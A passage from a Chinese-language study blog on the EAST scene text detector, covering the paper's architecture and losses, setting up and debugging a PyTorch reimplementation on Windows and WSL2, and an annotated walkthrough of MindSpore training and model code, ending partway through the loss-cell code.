    ​ 然后就能在 submit\ 里查看评估结果,和 ground truth 参考一下,能识别一点点东西。

    png

    ​ 返回出来的效果比它宣传的要差好多啊,呜呜呜……

    Calculated!{"precision": 0.527431421446384, "recall": 0.6109773712084737, "hmean": 0.566138746375195, "AP": 0}
    ]]>
    + 资源

    正文

    ​ 我们这个模型使用单个神经网络直接预测完整图像中的任意方向和四边形的单词或文本行,消除了不必要的中间步骤(如候选聚合和单词划分)。我们的模型在 ICDAR 2015COCO TextMSRA-TD500 中都非常好使!


    ​ 文本检测作为后续过程的先决条件,核心是设计特征来区分文本和背景。

    ​ 提出了一个快速准确的场景文本检测流水线,使用一个**完全卷积神经网络(FCN)模型,产生单词或文本行级别的预测,排除了冗余和缓慢的中间步骤。生成的文本预测可以是旋转的矩形或四边形,将被发送到非最大抑制(Non-Maximum Suppression,NMS)**以产生最终结果。


    EAST, since it is an Efficient and Accuracy Scene Text detection pipeline.

    png

    • Feature extractor
      stem,特征提取炳(PVANet)

      • 主干可以是在 ImageNet 数据集上预先训练的卷积网络,具有交错的卷积和池化层。从干提取四个级别的特征图,表示为 $f_i$,其大小分别为输入图像的 $\frac{1}{32},\frac{1}{16},\frac{1}{8}$ 和 $\frac{1}{4}$。
    • Feature-merging
      branch,特征合并分支

      • 逐渐将它们合并(concat):

        $g_i=\left{\begin{matrix}\mathrm{unpool}(h_i) & \mathrm{if} & i\le3 \ \mathrm{conv}_{3\times3}(h_i) & \mathrm{if} & i=4\end{matrix}\right.$

        $h_i=\left{\begin{matrix}f_i & \mathrm{if}\ i=1\\mathrm{conv}{3\times3}(\mathrm{conv{1\times1}}([g_{i-1};f_i])) & \mathrm{otherwise}\end{matrix}\right.$

        • $g_i$ 是合并基数

        • $h_i$ 是合并后的特征图

        • 运算符 $[·;·]$ 表示沿通道轴的串联

      • 在每个合并阶段,来自最后一个阶段的特征图首先被馈送到 unpool 层以使其大小加倍,然后与当前特征图连接。

      • $\mathrm{conv}_{1×1}$ 减少了通道数量并减少了计算

      • $\mathrm{conv}_{3\times3}$ 融合了信息,最终产生了这个合并阶段的输出

      • 在最后一个合并阶段之后,$\mathrm{conv}_{3\times3}$ 层生成合并分支的最终特征图,并将其提供给输出层。

    • Output layer,输出层

      • 对文本区域的两种几何形状进行实验:

        • 旋转框(RBOX)
          • 4 个轴对齐边界框(AABB)$\mathbf R$
          • 1 个通道旋转角度 $\theta$
        • 四边形(QUAD)
          • 使用 8 个数字来表示从四边形的四个角顶点 ${p_i|i\in{1,2,3,4}}$ 到像素位置的坐标偏移,由于每个距离偏移包含两个数字 $(\Delta x_i,\Delta y_i)$,几何输出包含 8 个通道。
    • 为每种几何形状设计了不同的损失函数:

      • $L=L_s+\lambda_gL_g$

        • $L_s$ 表示分数图的损失,$L_{s}=\mathrm{balanced-xent}(\hat{\mathbf{Y}},\mathbf{Y}{*})=-\beta\mathbf{Y}{}\log\hat{\mathbf{Y}}-(1-\beta)(1-\mathbf{Y}^{})\log(1-\hat{\mathbf{Y}})$

          • $\hat{\mathbf{Y}}=F_s$ 是分数图的预测
            • $\mathbf Y^*$ 是 ground truth
            • $\beta$ 是正样本和负样本之间的平衡因子,$\beta=1-\frac{\sum_{y^\in\mathbf Y*}y}{|\mathbf Y^*|}$
        • $L_g$ 表示几何图形的损失,直接用 $L_1$ 或 $L_2$ 将引导损失偏向于更大和更长的文本区域。

          • 在 RBOX 回归:$L_g=L_{AABB}+\lambda_\theta L_{\theta}$,$\lambda_\theta$ 取 10

            • AABB 部分采用 IoU 损失:$L_{AABB}=-\log\mathrm{IoU}(\hat{\mathbf{R}},\mathbf R^)=-\log\frac{|\mathbf{R}\cap \mathbf R^|}{|\mathbf{R}\cup \mathbf R^*|}$

            • 旋转角度损失:$L_\theta(\hat\theta,\theta*)=1-\cos(\hat\theta-\theta*)$

          • 在 QUAD 回归中采用尺度归一化平滑 $L_1$ 损失:$L_g=L_{QUAD}(\hat{\mathbf{Q}},\mathbf Q^*)$

        • $\lambda_g$ 表示两个损失之间的重要性,设为 1。

    • 包含几个 $\mathrm{conv}_{1×1}$ 操作,将 32 个通道的特征图投影到 1 个通道的分数图 $F_s$ 和一个多通道的几何图 $F_g$ 中。几何输出可以是 RBOX 或 QUAD 中的一个

    ​ 将阈值应用于每个预测区域,其中得分超过预定义阈值的几何体被认为是有效的,并保存以供以后进行非最大值抑制。NMS 之后的结果被认为是管道的最终输出。ADAM 优化器,batch=24。


    ​ NMS:在假设附近像素的几何图形往往高度相关的情况下,我们建议逐行合并几何图形,在合并同一行中的几何图形时,我们将迭代合并当前遇到的几何图形和最后合并的几何图形。这种改进的技术在最佳场景中在 $O(n)$ 中运行。尽管它的最坏情况与原始情况相同,但只要局部性假设成立,该算法在实践中运行得足够快。


    未来研究的可能方向包括:

    • 调整几何公式,以允许直接检测弯曲文本;
    • 将所述检测器与文本识别器集成;
    • 将该思想扩展到通用对象检测。

    代码

    Pytorch

    Windows

    1. SakuraRiven/EAST: PyTorch Re-Implementation of EAST: An Efficient and Accurate Scene Text Detector (github.com) 加载仓库:

    png

    加载工程文件
    1. conda 中新建一个 EAST 环境(conda create -n east python=3.7)并安装好:

      • pytorch
      • shapely
      • opencv-python 4.0.0.21
      • lanms,巨难装,用 pip install lanms-neo==1.0.2 -i https://pypi.tuna.tsinghua.edu.cn/simple
        • 如果是 wsl2 的 ubuntu, pip install lanms-proper

      设置好解释器

    png

    设置解释器
    1. 下载模型:VGG16EAST,将它们放在 pths/ 文件夹中

    png

    下载并放置预训练好的模型
    1. Downloads - Incidental Scene Text - Robust Reading Competition (uab.es) 下载好 ICDAR 2015 Challenge 4 数据集,解压并按规则放在对应的文件夹中(原项目想放到工程外面,我改到了工程里面)

    png

    数据集官网

    png

    下载出这么四个压缩包

    png

    设置数据集地址

    png

    修改路径
    1. 开跑 detect.py

    png

    预测结果
    1. 开跑 train.py!喜提错误:UnicodeDecodeError: ‘gbk’ codec can’t decode byte 0xbf in position 2: illegal multibyte sequence!在 dataset.py 中的第 382 行 with open(self.gt_files[index], 'r') as f: 改成 with open(self.gt_files[index], 'r', encoding='utf-8') as f: 填之。

    2. 开跑 train.py!喜提错误:torch.cuda.OutOfMemoryError: CUDA out of memory. Tried to allocate 1.50 GiB (GPU 0; 8.00 GiB total capacity; 3.14 GiB already allocated; 2.79 GiB free; 3.15 GiB reserved in total by PyTorch) If reserved memory is >> allocated memory try setting max_split_size_mb to avoid fragmentation. See documentation for Memory Management and PYTORCH_CUDA_ALLOC_CONF!在train.py 里把 batch_size = 24 改成 batch_size = 4 填之。

    3. 开跑 train.py!能跑了!

    WSL2

    装好环境

    1
    2
    3
    4
    5
    conda create -n EAST python=3.7
    conda activate EAST
    pip install shapely
    pip install opencv-python==4.0.0.21
    pip install lanms-proper

    开跑!

    1
    python3 train.py

    喜提错误:

    1
    2
    3
      File "/home/gz/anaconda3/envs/EAST/lib/python3.7/site-packages/cv2/__init__.py", line 3, in <module>
    from .cv2 import *
    ImportError: libSM.so.6: cannot open shared object file: No such file or directory

    填:

    1
    2
    sudo apt update
    sudo apt install libsm6

    喜提错误:

    1
    2
    Could not load library libcudnn_cnn_infer.so.8. Error: libcuda.so: cannot open shared object file: No such file or directory
    Please make sure libcudnn_cnn_infer.so.8 is in your library path!

    安装 CUDNN:

    1
    sudo apt install nvidia-cuda-toolkit

    开跑!

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    /home/gz/anaconda3/envs/EAST/lib/python3.7/site-packages/torch/optim/lr_scheduler.py:143: UserWarning: Detected call of `lr_scheduler.step()` before `optimizer.step()`. In PyTorch 1.1.0 and later, you should call them in the opposite order: `optimizer.step()` before `lr_scheduler.step()`.  Failure to do this will result in PyTorch skipping the first value of the learning rate schedule. See more details at https://pytorch.org/docs/stable/optim.html#how-to-adjust-learning-rate
    "https://pytorch.org/docs/stable/optim.html#how-to-adjust-learning-rate", UserWarning)
    /home/gz/anaconda3/envs/EAST/lib/python3.7/site-packages/shapely/set_operations.py:133: RuntimeWarning: invalid value encountered in intersection
    return lib.intersection(a, b, **kwargs)
    /home/gz/anaconda3/envs/EAST/lib/python3.7/site-packages/shapely/set_operations.py:133: RuntimeWarning: invalid value encountered in intersection
    return lib.intersection(a, b, **kwargs)
    /home/gz/anaconda3/envs/EAST/lib/python3.7/site-packages/shapely/set_operations.py:133: RuntimeWarning: invalid value encountered in intersection
    return lib.intersection(a, b, **kwargs)
    /home/gz/anaconda3/envs/EAST/lib/python3.7/site-packages/shapely/set_operations.py:133: RuntimeWarning: invalid value encountered in intersection
    return lib.intersection(a, b, **kwargs)
    classify loss is 0.98071122, angle loss is 0.68633509, iou loss is 5.08373260
    Epoch is [1/600], mini-batch is [1/250], time consumption is 8.06183171, batch_loss is 12.92779446
    classify loss is 0.99145019, angle loss is 0.75015461, iou loss is 4.81786251
    Epoch is [1/600], mini-batch is [2/250], time consumption is 0.21901011, batch_loss is 13.31085873
    classify loss is 0.99974638, angle loss is 0.74429435, iou loss is 5.48675823
    Epoch is [1/600], mini-batch is [3/250], time consumption is 0.21214652, batch_loss is 13.92944813
    classify loss is 0.99397326, angle loss is 0.60727608, iou loss is 3.27876091
    Epoch is [1/600], mini-batch is [4/250], time consumption is 0.22212124, batch_loss is 10.34549522
    classify loss is 0.99331516, angle loss is 0.67070889, iou loss is 3.67775035
    Epoch is [1/600], mini-batch is [5/250], time consumption is 0.23853326, batch_loss is 11.37815380
    classify loss is 0.98511696, angle loss is 0.73328424, iou loss is 3.17167139
    Epoch is [1/600], mini-batch is [6/250], time consumption is 0.20371103, batch_loss is 11.48963070
    classify loss is 0.99793059, angle loss is 0.60213274, iou loss is 4.67736626
    ...

    MindSpore

    读代码

    train.py

    好像跟其他的train.py差不多,设置完各种参数然后加载模型和优化器,开跑!

    各种细节都在src/里。

    1
    2
    3
    4
    5
    6
    from src.util import AverageMeter, get_param_groups
    from src.east import EAST, EastWithLossCell
    from src.logger import get_logger
    from src.initializer import default_recurisive_init
    from src.dataset import create_east_dataset
    from src.lr_scheduler import get_lr

    这段代码主要是对所需的模块进行引用,包括平均数计算、网络参数获取、EAST 模型、损失函数、日志记录、参数初始化、EAST 数据集和学习率调度器。

    首先,从src.util模块中引入AverageMeter()get_param_groups()方法,分别用于计算平均数和获取网络中需要训练的参数。

    接着,从src.east模块中引入EAST类和EastWithLossCell类,分别表示 EAST 模型和组合了损失函数的 EAST 模型。

    然后,从src.logger模块中引入get_logger()方法,用于获取日志记录器。

    接下来,从src.initializer模块中引入default_recursive_init()方法,用于对 EAST 模型进行默认的递归初始化。

    再者,从src.dataset模块中引入create_east_dataset()方法,用于创建 EAST 数据集。

    最后,从src.lr_scheduler模块中引入get_lr()方法,用于获取当前 epoch 的学习率。

    1. 设置 Parser 变量

    2. 设置分布式计算参数

    3. 设置 ModelArts 相关参数

    4. 设置相关路径(数据集、日志输出地址)

    5. 代码加速优化相关

    6. 加载模型

    7. 设置优化器

    8. 开始训练


    ​ 先使用 Argparse 模块创建一个 ArgumentParser 对象,用于解析命令行参数。

    ArgumentParser('mindspore icdar training'):创建一个 ArgumentParser 对象,并把 'mindspore icdar training' 作为参数传入,即设置程序的描述信息为 mindspore icdar training

    Parser 变量

    设备相关:

    nametypedefaulthelp
    –device_targetstrAscenddevice where the code will be implemented.
    –device_idint0device id where the model will be implemented.

    数据集相关:

    nametypedefaulthelp
    –data_dirstr‘./data/icdar2015/Training/’Train dataset directory.
    –per_batch_sizeint8Batch size for Training.
    –outputs_dirstr‘outputs/’output dir.

    神经网络相关:

    nametypedefaulthelp
    –pretrained_backbonestr‘./data/vgg/XXX.ckpt’The ckpt file of ResNet.
    –resume_eaststrThe ckpt file of EAST, which used to fine tune. (模型微调)

    优化器学习率相关:

    nametypedefaulthelp
    –lr_schedulerstr‘my_lr’Learning rate scheduler(学习率调整策略), options: exponential(指数衰减), cosine_annealing(余弦退火). Default: cosine_annealing
    –lrfloat0.001Learning rate.
    –per_stepfloat2Learning rate change times.
    –lr_gammafloat0.1Decrease lr by a factor of exponential lr_scheduler.(将 lr 减少指数 lr_scheduler系数)
    –eta_minfloat0.Eta_min in cosine_annealing scheduler.
    –t_maxint100T-max in cosine_annealing scheduler.
    –max_epochint600Max epoch num to train the model.
    –warmup_epochsfloat(?)6Warmup epochs.
    –weight_decayfloat0.0005Weight decay factor.

    损失函数相关:

    nametypedefaulthelp
    –loss_scaleint1Static loss scale.(静态损失标度)
    –resume_eaststr7,7Epoch of changing of lr changing, split with “,”(改变 lr 的 epoch 变化,用 “,” 拆分)

    日志相关:

    nametypedefaulthelp
    –log_intervalint10Logging interval steps.(记录间隔步骤)
    –ckpt_pathstr‘outputs/’Checkpoint save location.
    –ckpt_intervalint1000(太大了吧,牛逼)Save checkpoint interval.(保存检查点间隔)
    –is_save_on_masterint1Save ckpt on master or all rank, 1 for master, 0 for all ranks.(这个 master 和 rank 应该跟分布式计算有关)

    分布式计算相关:

    nametypedefaulthelp
    –is_distributedint0Distribute train or not, 1 for yes, 0 for no.
    –rankint0Local rank of distributed.
    –group_sizeint1World size of device.

    **profiler(性能分析器)**相关:

    nametypedefaulthelp
    –need_profilerint0Whether use profiler. 0 for no, 1 for yes.

    modelArts相关:

    nametypedefaulthelp
    –is_modelArtsint0Trainning in modelArts or not, 1 for yes, 0 for no.

    分布式计算

    这段代码主要是设置 Mindspore 的分布式计算的参数,我并不想动它。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    args, _ = parser.parse_known_args()
    args.device_id = int(os.getenv("DEVICE_ID", "0"))
    args.rank = args.device_id

    ms.set_context(mode=ms.GRAPH_MODE, device_target=args.device_target, device_id=args.device_id)
    if args.is_distributed:
    comm.init()
    args.rank = comm.get_rank()
    args.group_size = comm.get_group_size()
    ms.set_auto_parallel_context(parallel_mode=ms.ParallelMode.DATA_PARALLEL, gradients_mean=True,
    device_num=args.group_size)

    ModelArts

    ModelArts 相关的参数,但是我把它设为 0 依然能跑?

    这段代码主要是用于处理在华为云ModelArts平台上运行时的数据和模型路径。

    首先判断args.is_modelArts是否为True,如果是,则意味着程序运行在华为云ModelArts平台上,需要对存储路径进行修改。

    接着,导入moxing库,这个库是华为云针对ModelArts平台的Python SDK,提供了丰富的API用于读写数据、上传下载文件等操作。

    然后,根据当前进程的编号(即args.rank变量)生成本地数据路径和本地模型路径,并将模型文件从远程路径(即args.pretrained_backbone)重命名为本地模型路径。

    接下来,使用mox.file.copy_parallel()方法将数据从远程路径(即args.data_dir)拷贝到本地数据路径。

    最后,将输出路径(即args.outputs_dir)设置为/cache目录下的子目录。在ModelArts平台上运行程序时,程序的输出也需要放在/cache目录下,以保证数据的持久化存储。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    if args.is_modelArts:
    import moxing as mox

    local_data_url = os.path.join('/cache/data', str(args.rank))
    local_ckpt_url = os.path.join('/cache/ckpt', str(args.rank))
    local_ckpt_url = os.path.join(local_ckpt_url, 'backbone.ckpt')

    mox.file.rename(args.pretrained_backbone, local_ckpt_url)
    args.pretrained_backbone = local_ckpt_url

    mox.file.copy_parallel(args.data_dir, local_data_url)
    args.data_dir = local_data_url

    args.outputs_dir = os.path.join('/cache', args.outputs_dir)

    相关路径

    设置相关路径(数据集、日志):

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    args.data_root = os.path.abspath(os.path.join(args.data_dir, 'image'))
    args.txt_root = os.path.abspath(os.path.join(args.data_dir, 'groundTruth'))

    # 使用当前进程的编号(即 args.rank 变量)作为子目录名称,拼接成完整的输出文件夹路径
    outputs_dir = os.path.join(args.outputs_dir, str(args.rank))
    # 获取当前时间作为子目录名称,再次拼接成完整的输出文件夹路径
    args.outputs_dir = os.path.join(
    args.outputs_dir,
    datetime.datetime.now().strftime('%Y-%m-%d_time_%H_%M_%S'))
    args.logger = get_logger(args.outputs_dir, args.rank) # 调用 get_logger()函数创建一个日志记录器,并将日志保存在 args.outputs_dir 目录下
    args.logger.save_args(args) # 将所有参数保存在日志文件中

    if __name__ == "__main__":

    优化

    进行代码加速优化

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    if args.need_profiler:
    # 创建一个性能分析器,并将结果保存在args.outputs_dir路径下
    profiler = Profiler(
    output_path=args.outputs_dir,
    is_detail=True,
    is_show_op_path=True)

    # 创建一个AverageMeter对象用于记录损失值的平均值,以便后续输出和打印
    loss_meter = AverageMeter('loss')

    # 重置自动并行上下文
    context.reset_auto_parallel_context()
    parallel_mode = ParallelMode.STAND_ALONE
    degree = 1
    # 又是分布式计算相关……
    if args.is_distributed:
    parallel_mode = ParallelMode.DATA_PARALLEL
    degree = args.group_size
    context.set_auto_parallel_context(
    parallel_mode=parallel_mode,
    gradients_mean=True,
    device_num=degree)

    加载模型
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    network = EAST()  # 设置 network,加载 EAST 模型
    # default is kaiming-normal
    default_recurisive_init(network) # 对 EAST 模型进行默认的递归初始化。这里使用的是 kaiming-normal(He 正态分布)初始化方法

    # load pretrained_backbone
    if args.pretrained_backbone: # 如果不为 None,载入预训练的 backbone 模型
    parm_dict = load_checkpoint(args.pretrained_backbone) # 加载模型参数
    load_param_into_net(network, parm_dict) # 将模型参数加载到 network 上
    args.logger.info('finish load pretrained_backbone') # 在日志中记录加载完成的信息

    network = EastWithLossCell(network) # 将 EAST 模型和损失函数进行结合,即将模型传入 EastWithLossCell()函数,得到组合后的模型对象
    if args.resume_east: # 如果 args.resume_east 不为 None,继续训练之前保存的 EAST 模型,resume:恢复,继续
    param_dict = load_checkpoint(args.resume_east)
    load_param_into_net(network, param_dict)
    args.logger.info('finish get resume east')

    args.logger.info('finish get network')

    # 载入数据集,调用 create_east_dataset()函数,传入图片文件夹路径、文本文件夹路径、批量大小、设备数量、进程编号等参数,获取数据集以及数据总数,并在日志中记录加载完成的信息。
    ds, data_size = create_east_dataset(img_root=args.data_root, txt_root=args.txt_root, batch_size=args.per_batch_size,
    device_num=args.group_size, rank=args.rank, is_training=True)
    args.logger.info('Finish loading dataset')

    # 计算每个 epoch 中的步数,即将数据总数、批量大小和设备数量进行计算得到
    args.steps_per_epoch = int(
    data_size /
    args.per_batch_size /
    args.group_size)

    if not args.ckpt_interval:
    # 如果 args.ckpt_interval 为空,则将其设置为每个 epoch 的步数
    args.ckpt_interval = args.steps_per_epoch

    设置优化器
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    # get learnning rate
    lr = get_lr(args) # 函数获取当前epoch的学习率,并将其赋值给变量lr
    opt = Adam( # 使用Adam优化器进行优化,并指定优化器的参数为EAST模型中需要更新的参数
    params=get_param_groups(network),
    learning_rate=Tensor(
    lr,
    ms.float32))
    loss_scale = FixedLossScaleManager(1.0, drop_overflow_update=True) # 固定的损失缩放管理器
    model = Model(network, optimizer=opt, loss_scale_manager=loss_scale) # 使用Model函数从EAST模型对象和优化器拼接出一个完整的训练模型,并将损失缩放管理器传入
    # 这样就生成了完整的训练模型对象,并且可以对其进行训练

    训练

    开始训练

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    network.set_train()  # 将网络设置为训练状态
    # save the network model and parameters for subsequence fine-tuning
    # 设置保存检查点的配置信息,包括保存检查点的步数和最大保存数量,并将其赋值给变量 config_ck
    config_ck = CheckpointConfig(
    save_checkpoint_steps=100,
    keep_checkpoint_max=1)
    # group layers into an object with training and evaluation features
    # 指定模型参数保存路径
    save_ckpt_path = os.path.join(
    args.outputs_dir, 'ckpt_' + str(args.rank) + '/')
    # 使用 ModelCheckpoint()函数创建一个回调函数,用于保存训练模型参数
    ckpoint_cb = ModelCheckpoint(
    prefix="checkpoint_east",
    directory=save_ckpt_path,
    config=config_ck)
    # 创建一个回调函数,用于保存训练模型参数。其中,prefix 参数指定保存文件名的前缀,directory 参数指定保存路径,config 参数指定保存配置信息。
    callback = [
    TimeMonitor(data_size=data_size),
    LossMonitor(),
    ckpoint_cb
    ]
    # 调用 model.train()方法对训练模型进行训练,传入总 epoch 数、数据集以及之前定义的回调函数列表。在训练过程中,启用了数据集下沉模式,即 dataset_sink_mode=True,以提高训练效率
    model.train(
    args.max_epoch,
    ds,
    callbacks=callback,
    dataset_sink_mode=True)
    args.logger.info('==========end training===============')

    src/util.py

    定义了一些工具人类和函数,看不懂 orz:

    • class AverageMeter:记录各个指标的训练过程中的平均值和当前值
    • default_wd_filter():定义了一个默认的权重衰减过滤器函数,过滤掉不需要进行权重衰减的参数,例如偏置项和批归一化层中的偏置项和权重
    • get_param_groups():接受一个神经网络模型network作为参数,并将其可训练参数分成有权重衰减和无权重衰减两个组,并返回一个包含参数组信息的列表,每个参数组都包含paramsweight_decay两个键值对
    • class ShapeRecord:记录图像大小的类

    src/east.py

    class EAST

    定义了一个 EAST 网络的类 EAST

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    class EAST(nn.Cell):
    def __init__(self):
    super(EAST, self).__init__()
    # 提取图像特征的模块,返回 5 组特征图用于后续处理
    self.extractor = VGG16FeatureExtraction()
    # 将特征图组合的模块,将 5 组特征图拼接在一起,形成更为丰富多样的特征信息用于后续处理
    self.merge = Merge()
    # 输出模块,对拼接后的特征图进行卷积处理来得到文本区域预测分数 score 和几何信息预测值 geo
    self.output = Output()

    def construct(self, x_1):
    # 通过 x_1 输入数据调用 self.extractor()获取 5 组特征图
    f_0, f_1, f_2, f_3, f_4 = self.extractor(x_1)
    # 将这些特征图传入 self.merge()模块进行拼接,得到拼接后的特征图
    x_1 = self.merge(f_0, f_1, f_2, f_3, f_4)
    # 将该特征图输入到 self.output()模块获得文本区域预测分数 score 和几何信息预测值 geo
    score, geo = self.output(x_1)

    return score, geo

    png

    代码对应的就是论文里的三个部分了:

    • Feature extractor stem (PVANet) - class VGG16FeatureExtraction
      • 提取图像特征的模块,返回 5 组特征图用于后续处理
    • Feature-merging branch - class Merge
      • 将特征图组合的模块,将 5 组特征图拼接在一起,形成更为丰富多样的特征信息用于后续处理
    • Output layer - class Output
      • 输出模块,对拼接后的特征图进行卷积处理来得到文本区域预测分数score和几何信息预测值geo

    class VGG16FeatureExtraction

    大致就是定义了一堆卷积核,然后按照论文里的方式一阵卷,返回 5 组特征图,但是特征图的标号好像跟论文里是反着来的。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    class VGG16FeatureExtraction(nn.Cell):
    """VGG16FeatureExtraction for deeptext"""

    def __init__(self):
    super(VGG16FeatureExtraction, self).__init__()
    self.relu = nn.ReLU()
    self.max_pool = nn.MaxPool2d(kernel_size=2, stride=2)
    self.avg_pool = nn.AvgPool2d(kernel_size=2, stride=2)

    self.conv1_1 = _conv(
    in_channels=3,
    out_channels=64,
    kernel_size=3,
    padding=1)

    ……

    self.conv5_3 = _conv(
    in_channels=512,
    out_channels=512,
    kernel_size=3,
    padding=1)
    self.cast = P.Cast()

    def construct(self, out):
    """ Construction of VGG """
    f_0 = out
    out = self.cast(out, mstype.float32)
    out = self.conv1_1(out)
    out = self.relu(out)
    out = self.conv1_2(out)
    out = self.relu(out)
    out = self.max_pool(out)

    ……

    out = self.max_pool(out)
    f_4 = out
    out = self.conv5_1(out)
    out = self.relu(out)
    out = self.conv5_2(out)
    out = self.relu(out)
    out = self.conv5_3(out)
    out = self.relu(out)
    out = self.max_pool(out)
    f_5 = out

    return f_0, f_2, f_3, f_4, f_5

    class Merge

    P是 MindSpore 中的一个模块,代表了运算符(operators)。我们可以通过import mindspore.ops as P来引入这个模块,从而使用其中定义的各种运算符函数,例如上述代码中使用的Concat()ResizeBilinear()函数。

    也是定义一堆函数:

    • ResizeBilinear():是 MindSpore 中的一个图像处理函数,在图像上进行双线性插值,将输入图像缩放到指定大小。由于该模型中需要特征融合操作,因此使用该函数将不同尺度的特征图调整到相同尺寸,便于进行特征拼接。
    • concat():特征图拼接
    • nn.BatchNorm2d(128):是 MindSpore 中的一个二维批归一化函数,用于对网络模型中的卷积层或全连接层的输出进行归一化处理,以便更好地协调不同神经元之间的协同工作。
    • relu():激活函数
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    class Merge(nn.Cell):
    def __init__(self):
    super(Merge, self).__init__()

    self.conv1 = nn.Conv2d(1024, 128, 1, has_bias=True)
    self.bn1 = nn.BatchNorm2d(128)
    self.relu1 = nn.ReLU()
    self.conv2 = nn.Conv2d(
    128,
    128,
    3,
    padding=1,
    pad_mode='pad',
    has_bias=True)
    self.bn2 = nn.BatchNorm2d(128)
    self.relu2 = nn.ReLU()

    ……

    def construct(self, x, f1, f2, f3, f4):
    img_hight = P.Shape()(x)[2]
    img_width = P.Shape()(x)[3]

    out = P.ResizeBilinear((img_hight / 16, img_width / 16), True)(f4)
    out = self.concat((out, f3))
    out = self.relu1(self.bn1(self.conv1(out)))
    out = self.relu2(self.bn2(self.conv2(out)))

    out = P.ResizeBilinear((img_hight / 8, img_width / 8), True)(out)
    out = self.concat((out, f2))
    out = self.relu3(self.bn3(self.conv3(out)))
    out = self.relu4(self.bn4(self.conv4(out)))

    out = P.ResizeBilinear((img_hight / 4, img_width / 4), True)(out)
    out = self.concat((out, f1))
    out = self.relu5(self.bn5(self.conv5(out)))
    out = self.relu6(self.bn6(self.conv6(out)))

    out = self.relu7(self.bn7(self.conv7(out)))
    return out

    class Output
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    class Output(nn.Cell):
    def __init__(self, scope=512):
    super(Output, self).__init__()
    self.conv1 = nn.Conv2d(32, 1, 1)
    self.sigmoid1 = nn.Sigmoid()
    self.conv2 = nn.Conv2d(32, 4, 1)
    self.sigmoid2 = nn.Sigmoid()
    self.conv3 = nn.Conv2d(32, 1, 1)
    self.sigmoid3 = nn.Sigmoid()
    self.scope = scope
    self.concat = P.Concat(axis=1)
    self.PI = 3.1415926535898

    def construct(self, x):
    score = self.sigmoid1(self.conv1(x)) # 文本区域得分
    loc = self.sigmoid2(self.conv2(x)) * self.scope # 位置
    angle = (self.sigmoid3(self.conv3(x)) - 0.5) * self.PI # 倾斜角度
    geo = self.concat((loc, angle)) # 边界框信息包含位置和倾斜角度
    return score, geo # 最终返回文本区域得分和拼接后的边界框信息

    class EastLossBlock

    在该模块计算损失时,首先计算分类损失,即将预测得到的文本区域得分与真实标注的文本区域得分进行比较,采用 Dice 系数计算分类损失。

    接着,将预测得到的位置信息和真实标注的位置信息分别拆分出来,通过计算交并比(IoU)和角度误差得到位置损失,最终通过加权平均作为总体的位置损失。其中,角度误差使用余弦相似度计算。

    在计算位置损失时,还需考虑训练集中的样本是否为真实文本区域,需将训练集中非文本区域处的位置信息、分类标注和对应的模型预测结果剔除掉,以避免这些数据对损失计算的干扰。

    最后将分类损失和位置损失加权求和,作为总体损失并返回。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    class EastLossBlock(nn.Cell):
    def __init__(self):
    super(EastLossBlock, self).__init__()
    self.split = P.Split(1, 5)
    self.min = MyMin()
    self.log = P.Log()
    self.cos = P.Cos()
    self.mean = P.ReduceMean(keep_dims=False)
    self.sum = P.ReduceSum()
    self.eps = 1e-5
    self.dice = DiceCoefficient()

    def construct(
    self,
    y_true_cls,
    y_pred_cls,
    y_true_geo,
    y_pred_geo,
    training_mask):
    ans = self.sum(y_true_cls)
    # 将预测得到的文本区域得分与真实标注的文本区域得分进行比较,采用 Dice 系数计算分类损失
    classification_loss = self.dice(
    y_true_cls, y_pred_cls * (1 - training_mask))

    # n * 5 * h * w
    # 将预测得到的位置信息和真实标注的位置信息分别拆分出来
    d1_gt, d2_gt, d3_gt, d4_gt, theta_gt = self.split(y_true_geo)
    d1_pred, d2_pred, d3_pred, d4_pred, theta_pred = self.split(y_pred_geo)
    area_gt = (d1_gt + d3_gt) * (d2_gt + d4_gt)
    area_pred = (d1_pred + d3_pred) * (d2_pred + d4_pred)
    w_union = self.min(d2_gt, d2_pred) + self.min(d4_gt, d4_pred)
    h_union = self.min(d1_gt, d1_pred) + self.min(d3_gt, d3_pred)

    area_intersect = w_union * h_union
    area_union = area_gt + area_pred - area_intersect
    # 通过计算交并比(IoU)和角度误差得到位置损失
    iou_loss_map = -self.log((area_intersect + 1.0) /
    (area_union + 1.0)) # iou_loss_map
    angle_loss_map = 1 - self.cos(theta_pred - theta_gt) # angle_loss_map

    # 角度误差使用余弦相似度计算
    angle_loss = self.sum(angle_loss_map * y_true_cls) / ans
    iou_loss = self.sum(iou_loss_map * y_true_cls) / ans
    geo_loss = 10 * angle_loss + iou_loss

    return geo_loss + classification_loss

    class EastWithLossCell
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
